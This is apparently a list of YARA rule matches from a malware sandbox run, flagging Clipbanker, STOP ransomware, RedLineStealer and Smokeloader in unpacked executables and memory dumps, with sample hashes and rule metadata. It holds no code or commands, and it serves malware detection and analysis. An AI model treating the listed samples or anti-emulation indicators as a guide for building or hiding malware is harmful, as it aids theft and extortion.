Source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 26.2.build3.exe.9715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.build3.exe.9715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 18.2.build2.exe.2d915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.2.build2.exe.2d915a0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000020.00000002.2341456493.00000000008DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000010.00000002.2076965546.000000000494A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001F.00000002.2266884728.00000000049E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
